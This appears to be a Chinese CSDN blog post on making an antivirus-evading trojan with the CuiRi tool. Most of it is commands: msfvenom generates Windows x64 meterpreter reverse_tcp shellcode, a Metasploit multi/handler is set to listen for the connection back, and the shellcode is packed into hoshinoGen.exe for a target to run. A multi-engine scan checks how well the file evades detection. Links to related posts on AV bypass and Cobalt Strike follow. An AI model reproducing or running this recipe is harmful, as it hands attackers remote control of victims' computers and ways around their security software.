Cuiri免杀绕过

已于 2022-03-17 16:58:50 修改
阅读量895 收藏 3
点赞数
分类专栏: 安全渗透 文章标签: 渗透测试
于 2021-11-26 15:42:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43795682/article/details/121561707
版权

Cuiri免杀绕过:https://github.com/NyDubh3/CuiRi

Metasploit生成木马:

        msfvenom -p windows/x64/meterpreter/reverse_tcp  lhost=192.168.52.128 lport=3333 -f c    #导出C语言的shellcode

        监听语句:handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.52.128 -P 3333

Cobalt Strike生成木马:

        攻击 -> 生成后门 -> Payload Generator

Kali测试机Metasploit监控:

         use exploit/multi/handler

         set payload windows/x64/meterpreter/reverse_tcp

         set LHOST 192.168.52.128

         set LPORT 3333

         run

msfvenom -p windows/x64/meterpreter/reverse_tcp  lhost=192.168.52.128 lport=3333 -f c      #导出C语言的shellcode

复制下面内容重新创建1.txt放在与cuiri.win64.exe同目录下

cuiri_win64.exe -f 1.txt                   #导出hoshinoGen.exe文件

用户机打开hoshinoGen.exe

Kali机打开监听获取到权限

平台测试:VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎https://www.virscan.org/language/zh-cn/

注:如果打开运行,则win10会检测到病毒,下一步为修改.exe特征码问题

张星星9527
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
绕过杀毒软件,免杀木马制作
qq_43678263的博客
08-30 1881
绕过杀毒软件,免杀木马制作(以AVG Anti Spyware杀毒软件为例)
Java工具类之Base64Utils实现base64码转换为文件流-yellowcong
热门推荐
01-14 8万+
有时候,我们会遇到将文件转化为base64编码后的字符串,传递到服务器上,然后让服务器处理操作。我写了这个utils包,实现了文件和base64的相互转化。 懒汉模式1、通过双判断的方式,这种方式之所以是双判断,就是在a和b同时调用了这个方法,并都堵在了锁上,如果a线完事,b肯定就进去了, 如果不加上判断,b又实例化了一次。 2、通过直接给实例化方法加锁的方式,这种方式比较简单粗暴,但是效率教双判
利用ChuiR ShellCode免杀
她叫常玉莹
09-20 213
利用msfvenom生成c语言格式x64shellcode ChuiR使用GO语言编写的,需要配置GO环境 免杀效果非常好,360腾讯电脑管家随便过,VirSCAN全绿
percona-data-recovery-tool-for-innodb-0.5工具修复丢失数据
疯狂的石头
01-17 5920
一款开源的MySQL数据库InnoDB数据恢复工具:innodb-tools,它通过从原始数据文件中提取表的行记录,实现从丢失的或者被毁坏的MySQL表中恢复数据。例如,当你不小心执行DROP TABLE、TRUNCATE TABLE或者DROP DATABASE之后,可以通过以下方式恢复数据。 下载工具包;wget https://launchpad.net/percona-data-reco
GCC Manual
Technology is changing our lives.
12-30 4750
GCC(1)                                GNU                               GCC(1) NAME        gcc - GNU project C and C++ compiler SYNOPSIS        gcc [-c│-S│-E] [-std=standard]            [
木马 免杀
qq_52973916的博客
08-11 490
(CUIRI)**CUIRI是一款红队专用免杀木马生成器,该工具可以通过红队人员提供的一段 shellcode 快速生成一个绕过所有杀软的可执行木马。1.基于Syscall进行免杀,且随机混淆,可过几乎所有杀软2.内置go-strip对Go生成的木马进行编译信息抹除与程序信息混淆3.工具本体只有1个exe,搭配Go环境即可直接使用下载二进制文件,并且在系统上安装Go语言环境,然后将shellcode保存到1个txt文件中,即可使用本工具生成免杀马。
记一次内网横向免杀测试
渗透测试研究中心
02-15 3022
工具准备jexbossKali LinuxCS 4.3Windows杀软在线查询一Windows杀软在线查询二Windows杀软在线查询三fscan潮汐shellcode免杀LSTARCobaltStrike其他插件PEASS-ngPrintSpoofer外网打点1、为了练习内网横向,悄悄的盯上国外的站点2、发现jboss网站存在反序列化漏洞,是呀jexboss无法利用成功python jexb...
免杀绕过研究
SHELLCODE_8BIT的博客
03-15 1729
1.Linux下命令混淆 2.webshell混淆 3.远控免杀,各种静态动态 linux命令执行绕过,命令执行WAF绕过技巧总结_tegrodikk的博客-CSDN博客
安全攻防之BadUsb攻击之CS上线
wjwqp的专栏
05-28 1716
一、环境和准备 1.win7 X64系统 2.arduino Leonardo板子一块 3.cs4.4服务器(Linux已经启动CS并配置好监听器,本文不做讨论,感兴趣的自行百度) win7安装好Leonardo板子驱动,后显示结果如下 Com3端口,烧录时候会用到; HID编译工具,arduino-1.5.5-r2, 二、编译和上传代码到Leonardo板子 将Leonardo板子插入电脑,安装完驱动后选择好对应的板子和对应的Com口,如下...
smit工具的使用
09-22 259
ls smit.* smit.log smit.script smit.transaction smit.log 记录用户的详细操作 常用 smit.script. 命令的脚本 ...
人大金仓数据库KingbaseES PLSQL代码加密
最新发布
arthemis_14的博客
12-26 428
在某些情况下,我们所编写的PLSQL代码中可能含有机密信息,为了不使这些机密信息泄露出去,KingbaseES提供了加密PLSQL代码的功能。在KingbaseES中,有两种方式可以为PLSQL代码进行加密——使用PLSQL Wrapper 工具、使用系统包DBMS_DDL中的子程序。我们可以使用代码加密功能为PLSQL中的包体、存储过程和函数进行加密,对外隐藏这些程序的实现细节。
关于使用nodejs 来代替webpack打包js的整体库的工具
qq_25095105的博客
09-16 392
关于使用nodejs 来代替webpack打包js的整体库的工具 简介: 在我们的日常开发中可能会书写一些关于js的库 那么这些库就需要整体的打包成js 以及d.ts的声明文件便于后期的开发和使用 那么在此 如果使用webpack来打包就需要有特定的入口 那么如果不需要入口文件就能成功打包呢?以下就是做了一个为满足这 样的需求场景下的一个工具(目前有es5)。如有不妥之处还请见谅。 1.首先咱们需要建立一个ts的开发环境 可以参考资料 2.关于tsconfig的配置情况以下可以参考下 { "
Coredump 调试
m0_60529319的博客
03-19 282
程序异常退出时,会产生一个core文件,该文件记录了程序运行时的内存,寄存器状态,堆栈指针,内存管理信息还有各种函数调用堆栈信息等,我们可以理解为是程序工作当前状态存储生成的一个文件,通过工具分析这个文件,我们可以定位到程序异常退出的时候对应的堆栈调用等信息,找出问题所在并进行及时解决。------------------这里我们设置文件权限666 所有用户都可以对文件进行读写。当前执行程序的用户对core目录有写权限且有足够的空间存储core文件;生成不受限制的core文件;coredump是什么?
第17章 标准库特殊设施【C++】
高万禄的博客
07-27 275
如果你已经从第一章按部就班的学到了第17章,我相信你所认识的C++知识已经超过了很多人,因为有学习的同学并没有耐心慢慢全面地学完C++11的全部知识,从17章 标准库特殊设施以及第18章 用于大型程序的工具、第19章 特殊工具与技术这三个单元被统称为高级主题,这些内容往往在大型工程中意义重大首先介绍本章整体内容,tuple类型、bitset类型、正则表达式、随机数、进一步深入IO操作 tuple与pair有些类似,但是tuple支持多个元素,多种元素类型,在希望将一些数据组合成单一对象,但不想麻烦地自定义数
如何防范DDoS攻击,使自己的网站减缓DDoS攻击呢?
12-27 184
DDo S 攻击 这个东西 ,相信很多站长都 听过 。甚至 还会 有很多网站...
ATT&CK靶场系列(六)
qq_1873822的博客
12-21 3834
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/8/
Cobalt Strike安装配置和连接
soldi_er的博客
04-16 2764
文章目录寻找资源1.官网渠道2.Github社区参考 寻找资源 1.官网渠道   先看官网,地址https://www.cobaltstrike.com/   访问官网,点击Download,填写资料申请试用,竟然不支持中国地区试用   trials are only available to users in the United States, Australia, Canada, the European Union, Japan, New Zealand, Singapore, and the U
Shellcode免杀绕过360安全卫士、火绒安全、腾讯管家
qq_1873822的博客
08-22 1万+
前言 分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷 杀毒原理 360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。 1.基于特征码的静态扫描技术 这种技术很容易被人想到,所以第一代的杀毒软件出现了,他们的杀毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今
cobaltstrike4.3插件——BypassAV免杀使用
wdsj_xh的博客
05-12 5632
0x01* 环境介绍 本次免杀所使用的是shellcode分离免杀技术 cobaltstrike4.3客户端:Windows10 专业版 cobaltstrike4.3客户端:自己VPS CS版本:4.3 语言环境:Golang,插件需要本地安装Golang环境,生成木马时会调用编译 cobaltstrike4.3下载和使用见前面文章,CSDN应该发不了破解类东西啦,贴下自己网站链接 http://www.digter8.com/391.html CS 4.3下载 http://www.digter8.co

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值